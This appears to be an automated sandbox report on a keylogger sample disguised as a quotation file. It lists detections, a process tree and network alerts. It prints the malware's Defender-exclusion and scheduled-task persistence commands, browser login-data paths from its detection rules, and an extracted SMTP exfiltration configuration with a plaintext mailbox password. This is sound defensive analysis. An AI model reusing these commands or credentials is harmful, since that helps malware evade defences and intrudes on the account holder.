Edit tour

Windows Analysis Report
Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Overview

General Information

Sample name:	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Analysis ID:	1559184
MD5:	7b5985233faf11890e9cf4c7b579983b
SHA1:	cb2f20ad79ea7d8a1758ac2ae90a1c6d7f47e784
SHA256:	5cce0ced936e5d9c13d6a4a8a3c149371c92236eb4c465e0e422142946509cea
Tags:	exeuser-xzx
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Yara detected AntiVM3

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe (PID: 4408 cmdline: "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe" MD5: 7B5985233FAF11890E9CF4C7B579983B)

powershell.exe (PID: 5820 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6488 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 1488 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 6460 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp2F66.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe (PID: 5268 cmdline: "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe" MD5: 7B5985233FAF11890E9CF4C7B579983B)

jnqeRRexnD.exe (PID: 2820 cmdline: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe MD5: 7B5985233FAF11890E9CF4C7B579983B)

schtasks.exe (PID: 5696 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp42C0.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 5232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

jnqeRRexnD.exe (PID: 6448 cmdline: "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe" MD5: 7B5985233FAF11890E9CF4C7B579983B)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "transportes@contfly.pt", "Password": "Transportes2022*", "Host": "mail.contfly.pt", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "transportes@contfly.pt", "Password": "Transportes2022*", "Host": "mail.contfly.pt", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000E.00000002.4514729893.0000000000435000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0000000E.00000002.4514729893.000000000042D000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2789:$a1: get_encryptedPassword 0x2aa6:$a2: get_encryptedUsername 0x2599:$a3: get_timePasswordChanged 0x26a2:$a4: get_passwordField 0x279f:$a5: set_encryptedPassword 0x3e24:$a7: get_logins 0x3d87:$a10: KeyLoggerEventArgs 0x39ec:$a11: KeyLoggerEventArgsEventHandler
00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
0000000E.00000002.4517414324.0000000003198000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xc0671:$a1: get_encryptedPassword 0x103a91:$a1: get_encryptedPassword 0x146cb1:$a1: get_encryptedPassword 0xc098e:$a2: get_encryptedUsername 0x103dae:$a2: get_encryptedUsername 0x146fce:$a2: get_encryptedUsername 0xc0481:$a3: get_timePasswordChanged 0x1038a1:$a3: get_timePasswordChanged 0x146ac1:$a3: get_timePasswordChanged 0xc058a:$a4: get_passwordField 0x1039aa:$a4: get_passwordField 0x146bca:$a4: get_passwordField 0xc0687:$a5: set_encryptedPassword 0x103aa7:$a5: set_encryptedPassword 0x146cc7:$a5: set_encryptedPassword 0xc1d0c:$a7: get_logins 0x10512c:$a7: get_logins 0x14834c:$a7: get_logins 0xc1c6f:$a10: KeyLoggerEventArgs 0x10508f:$a10: KeyLoggerEventArgs 0x1482af:$a10: KeyLoggerEventArgs
Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x9ce3e:$a1: get_encryptedPassword 0x9d151:$a2: get_encryptedUsername 0x9cc58:$a3: get_timePasswordChanged 0x9cd61:$a4: get_passwordField 0x9ce54:$a5: set_encryptedPassword 0x9f300:$a7: get_logins 0x9f263:$a10: KeyLoggerEventArgs 0x9eecc:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 5268	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 5268	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: jnqeRRexnD.exe PID: 2820	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: jnqeRRexnD.exe PID: 6448	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: jnqeRRexnD.exe PID: 6448	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: jnqeRRexnD.exe PID: 6448	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: jnqeRRexnD.exe PID: 6448	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x193683:$a1: get_encryptedPassword 0x193996:$a2: get_encryptedUsername 0x19349d:$a3: get_timePasswordChanged 0x1935a6:$a4: get_passwordField 0x193699:$a5: set_encryptedPassword 0x195b45:$a7: get_logins 0x195aa8:$a10: KeyLoggerEventArgs 0x195711:$a11: KeyLoggerEventArgsEventHandler
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
14.2.jnqeRRexnD.exe.400000.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
14.2.jnqeRRexnD.exe.400000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d989:$a1: get_encryptedPassword 0x2dca6:$a2: get_encryptedUsername 0x2d799:$a3: get_timePasswordChanged 0x2d8a2:$a4: get_passwordField 0x2d99f:$a5: set_encryptedPassword 0x2f024:$a7: get_logins 0x2ef87:$a10: KeyLoggerEventArgs 0x2ebec:$a11: KeyLoggerEventArgsEventHandler
14.2.jnqeRRexnD.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e57e:$s1: UnHook 0x2e585:$s2: SetHook 0x2e58d:$s3: CallNextHook 0x2e59a:$s4: _hook
0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bb89:$a1: get_encryptedPassword 0x2bea6:$a2: get_encryptedUsername 0x2b999:$a3: get_timePasswordChanged 0x2baa2:$a4: get_passwordField 0x2bb9f:$a5: set_encryptedPassword 0x2d224:$a7: get_logins 0x2d187:$a10: KeyLoggerEventArgs 0x2cdec:$a11: KeyLoggerEventArgsEventHandler
0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3982c:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38ecf:$a3: \Google\Chrome\User Data\Default\Login Data 0x3912c:$a4: \Orbitum\User Data\Default\Login Data 0x39b0b:$a5: \Kometa\User Data\Default\Login Data
0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c77e:$s1: UnHook 0x2c785:$s2: SetHook 0x2c78d:$s3: CallNextHook 0x2c79a:$s4: _hook
0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bb89:$a1: get_encryptedPassword 0x2bea6:$a2: get_encryptedUsername 0x2b999:$a3: get_timePasswordChanged 0x2baa2:$a4: get_passwordField 0x2bb9f:$a5: set_encryptedPassword 0x2d224:$a7: get_logins 0x2d187:$a10: KeyLoggerEventArgs 0x2cdec:$a11: KeyLoggerEventArgsEventHandler
0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3982c:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38ecf:$a3: \Google\Chrome\User Data\Default\Login Data 0x3912c:$a4: \Orbitum\User Data\Default\Login Data 0x39b0b:$a5: \Kometa\User Data\Default\Login Data
0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2c77e:$s1: UnHook 0x2c785:$s2: SetHook 0x2c78d:$s3: CallNextHook 0x2c79a:$s4: _hook
0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d989:$a1: get_encryptedPassword 0x70ba9:$a1: get_encryptedPassword 0x2dca6:$a2: get_encryptedUsername 0x70ec6:$a2: get_encryptedUsername 0x2d799:$a3: get_timePasswordChanged 0x709b9:$a3: get_timePasswordChanged 0x2d8a2:$a4: get_passwordField 0x70ac2:$a4: get_passwordField 0x2d99f:$a5: set_encryptedPassword 0x70bbf:$a5: set_encryptedPassword 0x2f024:$a7: get_logins 0x72244:$a7: get_logins 0x2ef87:$a10: KeyLoggerEventArgs 0x721a7:$a10: KeyLoggerEventArgs 0x2ebec:$a11: KeyLoggerEventArgsEventHandler 0x71e0c:$a11: KeyLoggerEventArgsEventHandler
0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e57e:$s1: UnHook 0x7179e:$s1: UnHook 0x2e585:$s2: SetHook 0x717a5:$s2: SetHook 0x2e58d:$s3: CallNextHook 0x717ad:$s3: CallNextHook 0x2e59a:$s4: _hook 0x717ba:$s4: _hook
0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2d989:$a1: get_encryptedPassword 0x70da9:$a1: get_encryptedPassword 0xb3fc9:$a1: get_encryptedPassword 0x2dca6:$a2: get_encryptedUsername 0x710c6:$a2: get_encryptedUsername 0xb42e6:$a2: get_encryptedUsername 0x2d799:$a3: get_timePasswordChanged 0x70bb9:$a3: get_timePasswordChanged 0xb3dd9:$a3: get_timePasswordChanged 0x2d8a2:$a4: get_passwordField 0x70cc2:$a4: get_passwordField 0xb3ee2:$a4: get_passwordField 0x2d99f:$a5: set_encryptedPassword 0x70dbf:$a5: set_encryptedPassword 0xb3fdf:$a5: set_encryptedPassword 0x2f024:$a7: get_logins 0x72444:$a7: get_logins 0xb5664:$a7: get_logins 0x2ef87:$a10: KeyLoggerEventArgs 0x723a7:$a10: KeyLoggerEventArgs 0xb55c7:$a10: KeyLoggerEventArgs
0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2e57e:$s1: UnHook 0x7199e:$s1: UnHook 0xb4bbe:$s1: UnHook 0x2e585:$s2: SetHook 0x719a5:$s2: SetHook 0xb4bc5:$s2: SetHook 0x2e58d:$s3: CallNextHook 0x719ad:$s3: CallNextHook 0xb4bcd:$s3: CallNextHook 0x2e59a:$s4: _hook 0x719ba:$s4: _hook 0xb4bda:$s4: _hook
Click to see the 22 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe", ParentImage: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, ParentProcessId: 4408, ParentProcessName: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe", ProcessId: 5820, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp42C0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp42C0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe, ParentImage: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe, ParentProcessId: 2820, ParentProcessName: jnqeRRexnD.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp42C0.tmp", ProcessId: 5696, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp2F66.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp2F66.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe", ParentImage: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, ParentProcessId: 4408, ParentProcessName: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp2F66.tmp", ProcessId: 6460, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe", ParentImage: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, ParentProcessId: 4408, ParentProcessName: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe", ProcessId: 5820, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp2F66.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp2F66.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe", ParentImage: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, ParentProcessId: 4408, ParentProcessName: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp2F66.tmp", ProcessId: 6460, ProcessName: schtasks.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T09:33:07.122710+0100	2803305	3	Unknown Traffic	192.168.2.5	49710	188.114.96.3	443	TCP
2024-11-20T09:33:11.760095+0100	2803305	3	Unknown Traffic	192.168.2.5	49722	188.114.96.3	443	TCP
2024-11-20T09:33:13.280365+0100	2803305	3	Unknown Traffic	192.168.2.5	49727	188.114.96.3	443	TCP
2024-11-20T09:33:15.367632+0100	2803305	3	Unknown Traffic	192.168.2.5	49734	188.114.96.3	443	TCP
2024-11-20T09:33:15.821025+0100	2803305	3	Unknown Traffic	192.168.2.5	49735	188.114.96.3	443	TCP
2024-11-20T09:33:17.792972+0100	2803305	3	Unknown Traffic	192.168.2.5	49740	188.114.96.3	443	TCP
2024-11-20T09:33:19.152668+0100	2803305	3	Unknown Traffic	192.168.2.5	49745	188.114.96.3	443	TCP
2024-11-20T09:33:20.453006+0100	2803305	3	Unknown Traffic	192.168.2.5	49760	188.114.96.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-20T09:33:05.413269+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49708	158.101.44.242	80	TCP
2024-11-20T09:33:06.616399+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49708	158.101.44.242	80	TCP
2024-11-20T09:33:07.803913+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49712	158.101.44.242	80	TCP
2024-11-20T09:33:10.225779+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49717	158.101.44.242	80	TCP
2024-11-20T09:33:11.194526+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49717	158.101.44.242	80	TCP
2024-11-20T09:33:12.382036+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49724	158.101.44.242	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe

Avira: detection malicious, Label: HEUR/AGEN.1306899

Found malware configuration

Source: 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "transportes@contfly.pt", "Password": "Transportes2022*", "Host": "mail.contfly.pt", "Port": "587", "Version": "4.4"}
Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "transportes@contfly.pt", "Password": "Transportes2022*", "Host": "mail.contfly.pt", "Port": "587"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe

ReversingLabs: Detection: 34%

Multi AV Scanner detection for submitted file

Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

ReversingLabs: Detection: 34%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

